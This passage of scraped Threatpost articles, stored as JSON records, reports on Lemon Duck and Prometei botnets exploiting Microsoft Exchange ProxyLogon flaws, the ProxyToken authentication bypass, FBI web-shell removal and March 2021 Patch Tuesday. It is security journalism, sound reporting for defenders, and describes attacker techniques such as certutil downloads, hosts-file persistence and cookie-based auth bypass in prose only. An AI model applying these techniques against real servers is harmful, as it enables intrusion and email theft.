exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt 
Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with ProxyLogon exploits only the latest addition. 
Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. 
Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. 
The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. 
\u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. 
In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d\n", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. 
These requests contain a SecurityToken cookie that identifies them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, an attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. 
Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain composed of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action: in a court-authorized operation, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. 
Many enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. \u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors were installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. 
However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Demers said. \u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d\n", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. 
Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. 
\u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. 
While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\nMicrosoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. 
\u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. 
Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-23T17:33:27", "description": "A heretofore little-seen botnet dubbed Prometei is taking a page from advanced persistent threat (APT) cyberattackers: The malware is exploiting two of the Microsoft Exchange vulnerabilities collectively known as ProxyLogon, in order to drop a Monero cryptominer on its targets.\n\nIt\u2019s also highly complex and sophisticated, researchers noted. 
While cryptojacking is its current game, Cybereason researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from the Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\n\u201cIf they wish to, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\u201d Cybereason researcher Lior Rochberger noted in [an analysis](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) released Thursday. \u201c[And] since cryptomining can be resource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business continuity.\u201d\n\nThe report noted that Cybereason has recently seen wide swathes of Prometei attacks on a variety of industries, including construction, finance, insurance, manufacturing, retail, travel and utilities. Geographically speaking, it has been observed infecting networks in the U.S., U.K. and many other European countries, as well as countries in South America and East Asia. 
It was also observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet-bloc countries.\n\n\u201cThe victimology is quite random and opportunistic rather than highly targeted, which makes it even more dangerous and widespread,\u201d Rochberger said.\n\n## **Exploiting Microsoft Exchange Security Bugs**\n\n[ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) consists of four flaws that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), or as in this case, [cryptominers](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>).\n\nMicrosoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nWhen it comes to Prometei, researchers have observed attacks against companies in North America making use of the ProxyLogon bugs tracked as CVE-2021-27065 and CVE-2021-26858. Both are post-authentication arbitrary file-write vulnerabilities in Exchange; once authenticated with an Exchange server, attackers could write a file to any path on the server \u2013 thus achieving RCE.\n\nThe attackers use the vulnerabilities to install and execute the China Chopper web shell, according to Rochberger. 
They then use [China Chopper to launch a PowerShell](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), which in turn downloads a payload from an attacker-controlled URL. That payload is then saved and executed, which ultimately starts the Prometei botnet execution.\n\n\u201cPrometei is a modular and multistage cryptocurrency botnet that was first discovered in July 2020 which has both Windows and Linux versions,\u201d explained Rochberger, who added that the botnet could extend back to 2016. \u201cThe latest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range of tasks that make mining Monero coins the least of the victims\u2019 concerns.\u201d\n\n## **Prometei Under the Hood**\n\nThe first module of the botnet, zsvc.exe, copies itself into C:\\Windows with the name \u201csqhost.exe,\u201d and then creates a firewall rule that will allow sqhost.exe to create connections over HTTP, according to the research. It also sets a registry key for persistence, and creates several other registry keys for later command-and-control (C2) communications by additional modules.\n\n\u201cSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands,\u201d according to the analysis. \u201cSqhost.exe is able to parse the prometei.cgi file from four different hardcoded C2 servers. The file contains the command to be executed on the machine. The commands can be used as standalone native OS commands\u2026or can be used to interact with the other modules of the malware.\u201d\n\nIt also controls the XMRig cryptominer that the malware installs on the machine, Cybereason noted. 
The commands on offer include the ability to execute a program or open a file; start or stop the mining process; download files; gather system information; check if a specific port is open; search for specific files or extensions; and update the malware \u2013 among other things.\n\n\u201cThe malware authors are able to add more modules and expand their capabilities eas